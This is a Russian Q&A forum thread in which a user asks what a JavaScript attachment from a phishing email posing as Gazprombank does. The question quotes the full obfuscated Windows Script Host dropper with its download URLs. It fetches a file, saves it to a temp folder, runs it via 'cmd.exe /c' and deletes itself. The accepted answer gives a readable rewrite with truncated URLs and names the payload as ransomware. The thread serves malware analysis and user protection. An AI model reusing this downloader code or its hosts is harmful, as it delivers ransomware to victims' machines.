# Пришло письмо помогите разобраться что делает этот код на JS?

Tags: javascript

Сегодня мне пришло письмо типо отчет от газпромбанка и все в таком духе. Я распаковал zip и в нем папка отчет.docx а в папке лежит файл: Газпромбанк заказ.js Ну Я его запускать не стал а открыл в блокноте и понял что он что то скачивает а потом удаляет себя. Помогите разобраться пожалуйста так ли это ? Раз комментируйте если не трудно прошу?

```
function xmm() {
    var Fhg=295330;
    var HYF=Fhg+3254;
    var UXX=HYF/312;
    return UXX -834;
    }
var hQ = xmm();
function CTz() {
    var iDB=String.fromCharCode(498-394)+String.fromCharCode(5252/52-0)+String.fromCharCode(36*3)+String.fromCharCode(3996/37-0)+String.fromCharCode(5772/52-0)+String.fromCharCode(16*2)+String.fromCharCode(11305/95+0)+String.fromCharCode(3*37)+String.fromCharCode(6*19)+String.fromCharCode(413-305)+String.fromCharCode(20*5);
    return iDB;
}
var IoT = CTz();
function cN() {
    var wTG=667184;
    var FNA=wTG+36268;
    var J=FNA/961;
    return J -722;
    }
function Rk() {
    var eH=31985;
    var Bs=eH+2353;
    var k=Bs/582;
    return k -48;
    }
var y = cN() + Rk();

function DF(Uj, F)
{
    Uj["Open"]();
    Uj["Type"] = 1;

    var L = F["Respo" + "nseB" + "ody"];
    Uj["Wr" + "i" + "te"](L);
    Uj["Pos"+ "it" + "ion"] = 0;
}

function c() {
    var cLY=["le"];
    var QFl=cLY[0];
    return QFl;
}
function EX() {
    var XA=["th"];
    var ph=XA[0];
    return ph;
}
function oV() {
    var z="";
    return z;
}
function zEV() {
    var Fk="";
    return Fk;
}
function Ak(kK)
{
    var iof = c();
    var f = "ng";
    f += "";
    var m = EX();
    iof = iof + oV() + f + zEV() + m;
    var Unp = kK[iof];
    return Unp;
}

function Lp()
{
    var A=String.fromCharCode(212/2-0);
    var zhd = "Ob" + A + "e" + "ct";
    return zhd;
}

function a()
{
    var Qt=String.fromCharCode(8989/89-0)+String.fromCharCode(848-760);
    return "Act" + "iv" + Qt;
}

function pm(pP)
{
    var VjU = eval(a() + Lp());
    return VjU;
}

function vv(Dg)
{
    return typeof Dg;
}

function DK()
{
    var Kqe = 5;
    if (Kqe >= 3) {
    return "M" + "SXML2.XMLHTTP";
    }
    else { return 7; }
}

function yrI(dr)
{
    var PP = "";
    var yP = 0;

    var W = pm(dr+4);
    var iq = 0;
    if (false || (dr == iq))
        return false;


    iq = new W(DK());


    try
    {
    Cj = iq++;
    }
    catch (hLM)
    {
    var HT = typeof iq["Open"];
    return (HT == "unknown" );
    }
    return false;
}

function qch()
{
    var tD = "\x57" + "S" + "\x63" + "\x72" + "\x69" + "\x70" + "\x74";
    var Jv = tD;
    var gpv = eval(Jv);
    return gpv;
}

function e(Un, LYb)
{
    var ht = qch();
    var Zm = ht["Scrip" + "tFul" + "lName"];
    Un[LYb](Zm);
}

function d(OUV)
{
    return parseInt(OUV, 16);
}

function yqR(ee, ew)
{
    return d(ee);
}

function AY()
{
    return "GetS" + "pecia" + "lFol" + "der";
}

function MHh(igW)
{
    var vl = 128;
    var MQH = "not";
    try
    {
        MQH = "\\" + igW["GetT" + "empN" + "ame"]();
        MQH = MQH + vl["cha" + "rAt"](256);
    }
    catch (Hk)
    {
        MQH = igW[AY()](2) + MQH;
    }
    return MQH;
}


function dL(biq, LYb)
{
    biq["r" + "u" + "n"](LYb, 0);
    return 8;
}


function JOk(AV, aKG, biq)
{
    var NvX = AV["Read"]();
    var zIP = new biq("ADODB.Recordse" + "t");
    zIP["fields"]["append"]("bin", 201, AV["Size"]);
    zIP["open"]();
    zIP["ad" + "dN" + "ew"]();
    zIP("bin")["appendChunk"](NvX);
    zIP["update"]();
    NvX = zIP("bin")["va" + "l" + "ue"];

    var VOt = "le";
    if (NvX[VOt + "ngth"] > 10)
    {
        var q = "SaveT";
        q += "oFile";
        AV[q](aKG);
        return true;
    }

    return false;
}

function lj()
{
    var D = "cmd.e";
    D += "x";
    D += "e";
    D += " ";
    D += "/";
    D += "c";
    D += " ";
    return D;
}

function i(bQm)
{
    return new bQm("MSXML2.XMLHTTP");
}

function jY(F, I)
{
    var g=String.fromCharCode(3*37)+String.fromCharCode(616-504)+String.fromCharCode(7575/75-0)+String.fromCharCode(7700/70+0);
    var rZ=String.fromCharCode(7029/99-0)+String.fromCharCode(3*23)+String.fromCharCode(5124/61-0);
    var MXR=226790;
    var iJ=MXR+6008;
    var DAG=iJ/334;
    var eo=DAG-697;
    F[g](rZ, I, eo);
    try {
        var R=String.fromCharCode(5*23)+String.fromCharCode(10100/100-0)+String.fromCharCode(10*11)+String.fromCharCode(20*5);
        F[R]();
    } catch (O) {
        return (1-1);
    }
    return 1;
}


function yoo(SF)
{
    var pV = "Active" + SF;
    var gQ = eval(pV);

    return false?gQ:gQ;
}

function j()
{
    return "https://music.lanzate.net/wp-admin/css/colors/blue/sserv.jpg";
}

function Mjx()
{
    return Tw(j());
}

function x()
{
    return Tw("http://xn--e1adigbdjz5k.xn--p1ai/includes/sserv.jpg");
}

function Tw(FCZ)
{
    var BI = "XObject";
    var U = i(yoo(BI));
    var MR = 0;
    if (jY(U, FCZ) == 0)
        return false;

    if (U["Status"] != 100 + 101 - 1)
        return false;
    var OG = new (yoo(BI))("Scripting.FileSystemObject");
    var n = new (yoo(BI))("ADODB.Stream");
    FCZ = MHh(OG);

    DF(n, U);

    if (!JOk(n, FCZ, yoo(BI)))
        return 11;

    n["Close"]();

    var IB = yoo(BI);
    var Dm = "Wscrip";
    Dm += "t.Shell";
    var hyH = new (IB)( Dm );
    MR = dL(hyH, lj() + FCZ);
    if (MR < 10)
    {
        FCZ = "delet" + "eFile";
        e(OG, FCZ);
        return ((1+6)>3);
    }
    return (true?MR:0);
}

if (yrI(1))
{
    var un = Mjx();
    if (!un)
        un = x();
}
```

Comment: «Разберите за меня 300 строк кода» это скорее не вопрос, а задание. Для заданий этот сайт плохо подходит. Почитайте «[Как задать хороший вопрос?](https://ru.stackoverflow.com/help/how-to-ask)» и сконцентрируйтесь на конкретной проблеме.

Comment: Я же сказал что в общем скажите что делает этот скрипт ? Скачивает с этих ссылок и потом сам себя удаляет ? Может еще что ? Да и не утрируйте не 300 Я не знающий и то бегло посмотрел все понял т задаю вопрос так ли это ?

Comment: В с Казахстана ? Почему то в последнее время недопонимания у меня с Вами Видимо несовместимость, режим совместимости не работает )

Comment: То, что человек Вам помог это хорошо, рад за Вас. Но вопрос все равно неконкретный. Непонятно с какой строкой, функцией, ключевым словом или приемом возникли сложности, непонятно какие части кода Вы сами поняли, а какие нужно разъяснить. Конкретный вопрос мог бы получить более подробный ответ. P.S. Строк ровно 301 :) P.P.S. Несовместимость ищите на своей стороне, у меня все норм :)

Comment: Я понял вас что вы только считать и умеете. Вы прямолинейный человек ?  Видите только цель но не видите что по бокам происходит ! :) На нет и суда нет Человек понял а вы нет :) Спасибо что приняли участие в дискуссии, вы наверное хотели поучить новенького ? Вы завсегдатай тут а я тут пришел новый:) Вас прут такие вещи :)

Comment: Это цитирую конкретно для Казахстана:) понял что он что то скачивает а потом удаляет себя. Помогите разобраться пожалуйста так ли это ?

Comment: Разберу вопрос: Этот код скачивает что то ? Потом удаляет себя когда что то скачает ?

Comment: Цитирую:  Раз комментируйте если не трудно прошу? Поясняю: Если Вам не трудно то раз комментируйте  код, в дополнение к вопросу, если вам не трудно. Если трудно нет времени спасибо что ответили на поставленный вопрос. Если ответили :)

Comment: Вам спасибо что приняли участие в дискуссии и привет Казахстану. Я ответ получил и Спасибо за ответ Lexx918 он понял мой вопрос. Совместимость есть :) Вы посчитали строчки а Lexx918 прочитал вопрос :)

Comment: Цитирую Вас: Непонятно с какой строкой, функцией, ключевым словом или приемом возникли сложности, непонятно какие части кода Вы сами поняли, а какие нужно разъяснить.   Отвечаю: Вопрос по всему коду в общем, конкретно что он делает и удаляет себя(файл в котором код) по завершении выполненного кода? Вот такой вот вопрос :)

Comment: Я не хотел Вас обидеть и прошу простить меня если увидели грубость и повторения моих слов к комментариях. Ну все люди разные и это природа так что ли. Я не правильно вопрос задал, Вы не поняли, Другой ответил на мой вопрос. Спасибо что дали понять, впредь буду более конкретен :)

Answer (score 8, accepted):

Скрипт пытается скачать пару фоток, которые перечислены в этих функциях (концовки ссылок обрезал чтоб никто не открыл случайно):

```
function Mjx() {
    return Tw("https://music.lanzate.net/wp-admin/css/colors/***");
}
function x() {
    return Tw("http://xn--e1adigbdjz5k.xn--p1ai/includes/***");
}
```

Первая ссылка уже не работает. Во второй dr.web нашёл трояна:

```
infected with Trojan.Encoder.858
```

UPD.: попробовал восстановить исходник чтоб ответить на вопрос

> а как они трояна скачивают?

Рассчитано на работу под виндой. Открывают поток, читают в него байты картинки, создают временный файл в системной или временной папке винды, пишут в файл данные полученные в потоке, закрывают файл и пытаются запустить его шелл-командой `run`, самоудаляются.

Мог по пути где-то опечататься и неверно восстановить исходник. Но в целом, думаю, понятно что там происходит.

```
function checkXmlHttp() {
    return typeof (new ActiveXObject("MSXML2.XMLHTTP")).Open == "unknown";
}

function fileName(fs) {
    let r = "not";
    try {
        r = "\\" + fs.GetTempName();
        r = r + (128).charAt(256);
    } catch (Hk) {
        r = fs.GetSpecialFolder(2) + r; // %TMP%
    }
    return r;
}

function saveFile(stream, uri) {
    let data = stream.Read();
    let rec = new ActiveXObject("ADODB.Recordset");
    rec.fields.append("bin", 201, stream.Size);
    rec.open();
    rec.addNew();
    rec("bin").appendChunk(data);
    rec.update();
    data = rec("bin").value;

    if (data.length > 10) {
        stream.SaveToFile(uri);
        return true;
    }
    return false;
}

function loadSaveAndRun(uri) {
    let xmlhttp = new ActiveXObject("MSXML2.XMLHTTP");
    xmlhttp.open("GET", uri, 0);
    try {
        xmlhttp.send();
    } catch (e) {
        return false;
    }
    if (xmlhttp.Status != 200) {
        return false;
    }

    let fs = new ActiveXObject("Scripting.FileSystemObject");
    let stream = new ActiveXObject("ADODB.Stream");
    let fileName = fileName(fs);

    stream.Open();
    stream.Type = 1;
    stream.Write(xmlhttp.ResponseBody);
    stream.Position = 0;

    if (!saveFile(stream, fileName)) {
        return 11;
    }

    stream.Close();

    let shell = new ActiveXObject("Wscript.Shell");
    shell.run("cmd.exe /c " + fileName, 0);
    fs.deleteFile(WScript.ScriptFullName);
    return true;
}

if (checkXmlHttp()) {
    let success = loadSaveAndRun("https://music.lanzate.net/wp-admin/***");
    if (!success)
        success = loadSaveAndRun("http://xn--e1adigbdjz5k.xn--p1ai/includes/***");
}
```

Comment: Так ссылки на изображения а как они трояна скачивают ? Спасибо огромное что согласились помочь а то люди так все при увеличивают Говорят 300 строк )))))

Comment: @Helpsetup добавил в ответ исходник целиком.

Comment: Спасибо еще раз !